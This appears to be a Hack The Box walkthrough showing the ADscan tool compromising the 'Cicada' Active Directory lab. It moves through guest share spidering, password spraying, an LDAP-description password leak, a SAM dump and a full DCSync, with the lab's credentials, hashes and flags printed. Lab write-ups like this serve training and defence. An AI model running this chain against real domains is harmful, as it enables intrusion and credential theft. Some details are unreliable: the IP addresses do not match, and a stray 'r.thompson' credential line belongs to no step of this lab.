🐛 Cicada - Auto-Pwn Walkthrough
Automatically compromise HTB Cicada using ADscan through SMB share spidering, password spraying, and domain credential dumping
1
Setup2
Configure3
Scan4
Enumerate5
EscalateLab Information
🟢Easy⏱️~5 min📂SMB Share Spidering🎯Password Spraying🗄️DCSync Credential Dump
- Platform: Hack The Box
- Machine: Cicada (Retired)
- Difficulty: Easy
- OS: Windows Server 2008 R2
- Domain: cicada.htb
Prerequisites
If this is your first time using ADscan:
- Follow the Getting Started guide to install ADscan.
- Run
adscan installto pull the ADscan runtime image.
Before starting this lab, verify your environment:
adscan check
adscan install # if the check reports missing images or Docker issuesEnsure you also have:
- An active VPN connection to the HTB network
- The correct VPN interface up (typically
tun0)
Attack Overview
Cicada is vulnerable to:
- SMB Share Enumeration - Discover HR documents and leaked passwords with guest access
- Password Spraying - Use high-confidence passwords to compromise multiple users
- LDAP Metadata Abuse - Steal passwords from descriptive fields (user descriptions)
- Backup Operator Abuse - Use backup-style privileges to dump local SAM and pivot to Domain Admin
- DCSync Credential Dump - Extract all domain account hashes for persistence
Estimated time with ADscan: ~4-5 minutes (automatic mode)
Walkthrough
Step 1: Workspace Setup
Start ADscan and create a dedicated workspace for this lab:
adscan startIf this is your first run (no workspaces yet), ADscan will prompt you to create one.
⚠ No workspaces detected.
Enter name for a new workspace: : cicada
✓ Workspace 'cicada' created
ℹ Loading workspace data from: ~/.adscan/workspaces/cicada
ℹ Variables loaded from ~/.adscan/workspaces/cicada/variables.json
✓ Workspace data successfully processed for ~/.adscan/workspaces/cicada
✓ Workspace 'cicada' selected automatically as it's the only one.Step 2: Configure Target
Set the scan parameters for Cicada:
(ADscan:cicada ~/.adscan/workspaces/cicada) > set hosts 10.10.10.182
(ADscan:cicada ~/.adscan/workspaces/cicada) > set iface tun0
(ADscan:cicada ~/.adscan/workspaces/cicada) > set auto true ✓ Hosts configured: 10.10.10.182
✓ Interface configured: tun0 with IP: 10.10.14.X
✓ Auto mode configured: TrueScope: Cicada is a multi-stage AD lab where ADscan LITE shines after you have network access to the domain controller over the HTB VPN. From that point, it automates guest HR share spidering, multi-step password spraying, Backup Operator abuse, flag capture, and DCSync.
For labs where most of the work is web, reversing, or other non-AD puzzles before any AD service is reachable, see Labs Scope & Coverage to see how ADscan fits into a hybrid workflow.
Step 3: Start Unauthenticated Scan
Launch the initial unauthenticated enumeration:
(ADscan:cicada ~/.adscan/workspaces/cicada) > start_unauthADscan will first attempt SMB-based discovery (null session, RID cycling) and only pivot to LDAP or authenticated actions once it has a user list or credentials.
3.1 SMB Discovery and User Enumeration
ℹ Starting host detection on 10.129.231.149...
ℹ Starting smb scan
⚠ New domain found: cicada.htb
✓ smb scan finished.
ℹ Checking for null sessions on SMB on the domain cicada.htb
✗ null sessions not accepted for domain cicada.htb.
ℹ Checking RID cycling for guest session
⚠ No output received from NetExec (attempt 1/3). Retrying command...
✓ RID cycling successful with a guest session on domain cicada.htb
ℹ Enumerating users by RID
6 Users found
╭───────┬───────────────────╮
│ Index │ Users │
├───────┼───────────────────┤
│ 1 │ Administrator │
│ 2 │ john.smoulder │
│ 3 │ sarah.dantelia │
│ 4 │ michael.wrightson │
│ 5 │ david.orelious │
│ 6 │ emily.oscars │
╰───────┴───────────────────╯
ℹ Searching for AS-REP roastable users in domain cicada.htb
✗ No asreproastable users found in domain cicada.htb
Do you want to perform password spraying on domain cicada.htb using a with_users session? [y/n] (y): n- ADscan discovers the
cicada.htbdomain during the initial SMB scan. - Null sessions are rejected, so it falls back to RID cycling with a guest session.
- RID cycling successfully enumerates six domain users, giving a solid username list.
- AS-REP roasting is attempted but no roastable users are found.
- We intentionally skip immediate password spraying with the
with_userssession to stay closer to the real lab flow.
3.2 Guest Share Enumeration (HR)
ℹ Checking shares access with a null session on domain cicada.htb
✗ null sessions not accepted on any share of cicada.htb
ℹ Checking shares access with a guest session on domain cicada.htb
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ SMB Shares discovered on cicada.htb │
│ (guest session) │
│ │
│ Host Share Permission │
│ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ │
│ 10.129.231.149 HR READ │
│ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
Do you want to search for juicy information in the shares in domain cicada.htb with a guest session (⚠ WARNING: This will be really noisy and will saturate the network in big domains)? [y/n] (y): y
ℹ Searching for interesting file extensions in the shares of domain cicada.htb. This might take a while, please be patient
✗ No files found
ℹ Searching for possible passwords in the shares of domain cicada.htb. This might take a while, please be patient
ℹ Log saved in smb/spidering_passw.log
✓ Credentials found in shares:
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ DOC_CREDENTIALS (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ Cicada$M6Corpb*@Lp#nZp!8 │ 99.90% │ 10 │ │
│ └──────┴──────────────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Password (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ Cicada$M6Corpb*@Lp#nZp!8 │ 99.44% │ 10 │ │
│ └──────┴──────────────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
✓ Credentials saved to smb/spidering/ directory:
ℹ - DOC_CREDENTIALS: smb/spidering/doc_credentials.json
ℹ - Password: smb/spidering/password.json
? Select a password for password spraying (sorted by ML confidence): (Use arrow keys)
» Cicada$M6Corpb*@Lp#nZp!8 [ML: 99.90%]- Null sessions to shares fail, but guest access is allowed to the
HRshare. - ADscan spiders the share and runs its ML-based secret detector over file contents.
- A strong-looking candidate password
Cicada$M6Corpb*@Lp#nZp!8is found and ranked with very high confidence. - The credential is stored under
smb/spidering/, so the workspace keeps a full audit trail. - This password will be reused in the next step for domain-wide password spraying.
3.3 Password Spraying and Initial Access
ℹ Selected credential for spraying: Cicada$M6Corpb*@Lp#nZp!8
Do you want to perform password spraying on domain cicada.htb using the selected credential? [y/n] (y):
ℹ Performing password spraying on domain cicada.htb with found password...
ℹ Executing spraying command for cicada.htb
⚠ Performing the spraying on cicada.htb. Please be patient (this can take a while)
✓ [!] 2025/12/04 20:03:03 > [+] VALID LOGIN: [email protected]:Cicada$M6Corpb*@Lp#nZp!8
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for [email protected]
⚠ LITE mode: 🔒 Trust enumeration requires PRO.
ℹ Starting authenticated enumeration for 'cicada.htb' domain.
ℹ BloodHound data collection for cicada.htb is starting (this might take a while in big domains)
ℹ Running BloodHound collector on the domain cicada.htb (this may take a while)
✓ BloodHound collector executed successfully on the domain cicada.htb.
ℹ Launching BloodHound CE suite...
ℹ BloodHound CE is ready!
Access the UI at: http://localhost:8442/ui/login
ℹ Uploading ZIP file to BloodHound CE automatically
⚠ ZIP file uploaded but ingestion status unclear. Check BloodHound CE UI for details.
ℹ Searching for enabled computers on domain cicada.htb
1 Enabled Computers found
╭───────┬──────────────────────╮
│ Index │ Enabled Computers │
├───────┼──────────────────────┤
│ 1 │ cicada-dc.cicada.htb │
╰───────┴──────────────────────╯
ℹ Executing port scan in domain cicada.htb (this might take a while in big domains)...
✓ Important port scan for the domain completed.
ℹ Creating a list of all enabled users for domain cicada.htb
7 Enabled Users found
╭───────┬───────────────────╮
│ Index │ Enabled Users │
├───────┼───────────────────┤
│ 1 │ Administrator │
│ 2 │ Guest │
│ 3 │ john.smoulder │
│ 4 │ sarah.dantelia │
│ 5 │ michael.wrightson │
│ 6 │ david.orelious │
│ 7 │ emily.oscars │
╰───────┴───────────────────╯
ℹ Creating a list of admin users for domain cicada.htb
2 Admin Users found
╭───────┬───────────────╮
│ Index │ Admin Users │
├───────┼───────────────┤
│ 1 │ Administrator │
│ 2 │ emily.oscars │
╰───────┴───────────────╯
ℹ Creating a list of privileged users for domain cicada.htb
2 Privileged Users found
╭───────┬──────────────────╮
│ Index │ Privileged Users │
├───────┼──────────────────┤
│ 1 │ Administrator │
│ 2 │ emily.oscars │
╰───────┴──────────────────╯
ℹ Enumerating Kerberos delegations in domain cicada.htb
✗ No delegations found in domain.
ℹ Searching for ADCS in domain cicada.htb
✗ ADCS not found in domain cicada.htb
ℹ Searching for kerberoastable users in domain cicada.htb
✗ No kerberoastable users found in domain cicada.htb
ℹ The user michael.wrightson is not in the privileged list of domain cicada.htb
Do you want to enumerate privileges for user michael.wrightson? [y/n]: n
Do you want to perform password spraying on domain cicada.htb using a auth session? [y/n] (y): n- ADscan validates the sprayed password and logs in as
michael.wrightson. - BloodHound collection and port scanning provide an overview of domain computers and topology.
- Enabled and privileged user lists highlight
emily.oscarsas a key target. - Since
michael.wrightsonis not privileged, the workflow pivots to hunting for additional credentials instead of immediately exploiting AD paths.
3.4 LDAP Descriptions → david.orelious
Do you want to perform password spraying on domain cicada.htb using a auth session? [y/n] (y): n
ℹ Searching for user descriptions in domain cicada.htb
✓ Moved UserDesc log to domains/cicada.htb/ldap/descriptions.log
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ User Descriptions (4 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ │
│ ┃ # ┃ Username ┃ Description ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩ │
│ │ 1 │ Administrator │ Built-in account for administering the computer/domain │ │
│ │ 2 │ Guest │ Built-in account for guest access to the computer/domain │ │
│ │ 3 │ david.orelious │ Just in case I forget my password is aRt$Lp#7t*VQ!3 │ │
│ │ 4 │ krbtgt │ Key Distribution Center Service Account │ │
│ └──────┴────────────────┴──────────────────────────────────────────────────────────┘ │
│ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
✓ [+] Found 1 potential password(s) in user descriptions:
ℹ User: david.orelious - Password: aRt$Lp#7t*VQ!3 (confidence: 76.32%)
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for [email protected]
ℹ The user david.orelious is not in the privileged list of domain cicada.htb
Do you want to enumerate privileges for user david.orelious? [y/n]: y
Do you want to enumerate privileges for user david.orelious on various services on hosts? (⚠ WARNING: This will saturate the network if the number of hosts in domain cicada.htb is very high) [y/n]: y
ℹ Starting smb privilege enumeration for user david.orelious
✗ smb enumeration completed for user david.orelious. No hosts with privileges found.
ℹ Starting winrm privilege enumeration for user david.orelious
✗ winrm enumeration completed for user david.orelious. No hosts with privileges found.- LDAP descriptions often contain operational notes; here one leaks
david.orelious’s password in plain text. - ADscan automatically extracts that value and tests it, obtaining a TGT for
david.orelious. - Privilege checks confirm he is not privileged and has no direct SMB/WinRM access advantages.
- The account is still useful for expanding share access and discovering more secrets.
3.5 Shares as david.orelious → Second Password
Do you want to enumerate shares for user david.orelious in the domain cicada.htb? [y/n] (y): y
ℹ Checking shares access as user david.orelious in domain cicada.htb
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ SMB Shares discovered on cicada.htb │
│ (david.orelious session) │
│ │
│ Host Share Permission │
│ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ │
│ 10.129.231.149 SYSVOL READ │
│ DEV READ │
│ HR READ │
│ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
Do you want to search for juicy information in the shares in domain cicada.htb with a david.orelious session (⚠ WARNING: This will be really noisy and will saturate the network in big domains)?
[y/n] (y): y
ℹ Searching for possible passwords in the shares of domain cicada.htb. This might take a while, please be patient
ℹ Log saved in smb/spidering_passw.log
✓ Credentials found in shares:
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ CMD ConvertTo-SecureString (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ Q!3@Lp#M6b*7t*Vt │ 99.99% │ 8 │ │
│ └──────┴──────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ DOC_CREDENTIALS (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ Cicada$M6Corpb*@Lp#nZp!8 │ 99.90% │ 12 │ │
│ └──────┴──────────────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Password (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ Cicada$M6Corpb*@Lp#nZp!8 │ 99.44% │ 12 │ │
│ └──────┴──────────────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
✓ Credentials saved to smb/spidering/ directory:
ℹ - DOC_CREDENTIALS: smb/spidering/doc_credentials.json
ℹ - CMD ConvertTo-SecureString: smb/spidering/cmd_convertto-securestring.json
ℹ - Password: smb/spidering/password.json
? Select a password for password spraying (sorted by ML confidence): (Use arrow keys)
» Q!3@Lp#M6b*7t*Vt [ML: 99.99%]
Cicada$M6Corpb*@Lp#nZp!8 [ML: 99.90%]- With
david.orelious’s access, ADscan can spider additional shares and spot PowerShellConvertTo-SecureStringusage. - The secure string reveals a new, highly ranked password
Q!3@Lp#M6b*7t*Vt. - Both this and the earlier Cicada password are saved into the workspace’s
smb/spidering/JSON files. - ADscan selects the new password as the best candidate for another round of domain-wide spraying.
3.6 Second Spraying and Flag Capture
ℹ Selected credential for spraying: Q!3@Lp#M6b*7t*Vt
⚠ Note: 2 credentials were found. Only the selected credential will be used for automated spraying. All credentials have been saved to smb/spidering/ directory. You can manually perform password
spraying with the other credentials later, but be careful not to lock accounts. Wait at least 1 hour between password spraying attempts (or as specified in the password policy).
Do you want to perform password spraying on domain cicada.htb using the selected credential? [y/n] (y):
ℹ Performing password spraying on domain cicada.htb with found password...
ℹ Executing spraying command for cicada.htb
⚠ Performing the spraying on cicada.htb. Please be patient (this can take a while)
✓ [!] 2025/12/04 20:06:05 > [+] VALID LOGIN: [email protected]:Q!3@Lp#M6b*7t*Vt
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for [email protected]
⚠ The user emily.oscars is in the privileged list of domain cicada.htb
⚠ User emily.oscars has elevated privileges in the domain (adminCount=1).
⚠ The user emily.oscars is a member of the Backup Operators group
⚠ User has winrm access to the PDC, dumping SAM through winrm
ℹ Dumping SAM credentials from host 10.129.231.149 in domain cicada.htb
⚠ Hash found from SAM dump - Local User: Administrator, NT Hash: 2b87e7c93a3e8a0ea4a581937016f341
✗ Logon failure for local user 'administrator' on host '10.129.231.149' via smb. Incorrect credentials.
ℹ Trying with domain credentials instead...
ℹ Kerberos ticket generated for [email protected]
⚠ The user administrator is in the privileged list of domain cicada.htb
⚠ User administrator has elevated privileges in the domain (adminCount=1).
⚠ The user administrator is a member of the Domain Admins group
╭──────────────── Domain Compromised ────────────────╮
│ │
│ Domain cicada.htb compromised in 5.61 minute(s). │
│ │
╰────────────────────────────────────────────────────╯
⚠ SMB/RPC port 445 is closed on the PDC. Unable to use 'net time' fallback.
⚠ Failed to synchronize clock with PDC 10.129.231.149
ℹ Obtaining flags from domain cicada.htb
Flags in domain cicada.htb
╭──────┬───────────────────────────────────────────────┬──────────────────────────────────╮
│ Type │ Path │ Flag │
├──────┼───────────────────────────────────────────────┼──────────────────────────────────┤
│ user │ C:\Users\emily.oscars.CICADA\Desktop\user.txt │ ef26403104395d504f47871b801e5694 │
│ root │ C:\Users\Administrator\Desktop\root.txt │ 5da453656222f948c5ebb48a7c2bb6f0 │
╰──────┴───────────────────────────────────────────────┴──────────────────────────────────╯
ℹ User flag saved to: /root/.adscan/workspaces/cicada/flags/user.txt
ℹ Root flag saved to: /root/.adscan/workspaces/cicada/flags/root.txt- Spraying with
Q!3@Lp#M6b*7t*Vtcompromisesemily.oscars, a Backup Operator with WinRM access to the DC. - ADscan abuses backup-style privileges to dump the local SAM and turn the Administrator hash into Domain Admin access.
- Once
[email protected]is obtained, ADscan captures both flags and the domain is fully owned.
3.7 Complete Credential Dump (DCSync)
Do you want to perform a DCSync in domain cicada.htb? [y/n]: y
Specify the user to extract NTLM hashes from (type 'All' for all users) (Administrator): All
ℹ Performing DCSync for all users
✗ Something went wrong while executing credential extraction. Reattempting with another method...
✓ Found credential: cicada.htb/Administrator with hash 2b87e7c93a3e8a0ea4a581937016f341
✓ Found credential: cicada.htb/krbtgt with hash 3779000802a4bb402736bee52963f8ef
✓ Found credential: cicada.htb/john.smoulder with hash 0d33a055d07e231ce088a91975f28dc4
✓ Found credential: cicada.htb/sarah.dantelia with hash d1c88b5c2ecc0e2679000c5c73baea20
✓ Found credential: cicada.htb/michael.wrightson with hash b222964c9f247e6b225ce9e7c4276776
✓ Found credential: cicada.htb/david.orelious with hash ef0bcbf3577b729dcfa6fbe1731d5a43
✓ Found credential: cicada.htb/emily.oscars with hash 559048ab2d168a4edf8e033d43165ee5
✓ DCSync completed successfully.
ℹ Extracted 7 domain credentials.
Extracted credentials for domain cicada.htb
╭───────────────────┬──────────────────────────────────╮
│ User │ Credential │
├───────────────────┼──────────────────────────────────┤
│ Administrator │ 2b87e7c93a3e8a0ea4a581937016f341 │
│ krbtgt │ 3779000802a4bb402736bee52963f8ef │
│ john.smoulder │ 0d33a055d07e231ce088a91975f28dc4 │
│ sarah.dantelia │ d1c88b5c2ecc0e2679000c5c73baea20 │
│ michael.wrightson │ b222964c9f247e6b225ce9e7c4276776 │
│ david.orelious │ ef0bcbf3577b729dcfa6fbe1731d5a43 │
│ emily.oscars │ 559048ab2d168a4edf8e033d43165ee5 │
╰───────────────────┴──────────────────────────────────╯- As a final step, ADscan performs a full DCSync to dump all domain account hashes.
- Even if the first attempt fails, it transparently retries with a different method until extraction succeeds.
- The final credential table gives a complete view of all domain users and hashes for reporting and follow‑up analysis.
Attack Chain Breakdown
- Technique: SMB spidering with guest session
- Outcome: ML classifier identifies strong password
Cicada$M6Corpb*@Lp#nZp!8in HR documents.
- Technique: Domain password spraying with a single high-confidence credential
- Outcome: Compromise of
michael.wrightson, plus full BloodHound / user enumeration.
- Technique: LDAP
descriptionfield hunting - Outcome: Cleartext password for
david.orelious, new TGT and expanded share access.
- Technique: Parsing
ConvertTo-SecureStringusage in scripts on SYSVOL/DEV/HR - Outcome: Second strong password
Q!3@Lp#M6b*7t*Vtextracted and validated.
- Technique: Password spraying with new credential, SAM dump via WinRM, hash re-use as domain credential
- Outcome:
emily.oscarscompromise, then[email protected]TGT and full domain control.
- Technique: Automated flag retrieval and DCSync with Administrator rights
- Outcome: User and root flags stored under the Cicada workspace, plus hashes for all 7 domain accounts.
Initial Access Achieved! Credentials obtained: r.thompson:rY4n5eva
Timing Breakdown
Automatic mode (set auto True):
- SMB discovery + RID cycling + guest HR spidering: ~60–90 seconds
- First password spray (
Cicada$…) + BloodHound collection: ~60–90 seconds - LDAP description hunting +
david.oreliousTGT + share spidering: ~60 seconds - Second password spray (
Q!3@…) + SAM dump + flags: ~60–90 seconds - Full DCSync of 7 accounts: ~30 seconds
- Total (observed): ~5–6 minutes (domain compromise banner: 5.61 minutes)
Semi-automatic mode (set auto False):
- Add ~2–3 minutes for manual confirmations and branching decisions
- Total (typical): ~7–9 minutes
Manual time: ~60–120 minutes | ADscan time: ~5–6 minutes
Troubleshooting
LDAP anonymous bind fails
Verify LDAP port accessibility:
nmap -p 389,636 10.10.10.182
# Should show open portsSMB access denied
Ensure credentials are correctly formatted:
# In ADscan
creds show
# Verify no encoding issues with passwordsClock skew errors
Synchronize time with target DC:
sudo ntpdate 10.10.10.182
# Kerberos requires time sync within 5 minutesKey Learning Points
What ADscan Automated
- Reconnaissance: SMB host detection, RID cycling, and guest share spidering
- Initial Access: Password discovery in HR documents and LDAP descriptions
- Lateral Movement: Password spraying to compromise multiple user accounts
- Privilege Escalation: Abuse of Backup Operator privileges and SAM dumping
- Post-Exploitation: DCSync-based credential harvesting for all domain accounts
Security Lessons
- LDAP hardening: Disable anonymous binds and restrict readable attributes
- Descriptive fields: Avoid storing passwords or hints in user descriptions or comments
- Secure storage: Never store passwords in scripts, documents, or logs in cleartext
- Backup privileges: Backup Operators effectively hold powerful lateral-movement and privilege-escalation capabilities
- Defense detection: Monitor for unusual password spraying, share spidering, and DCSync activity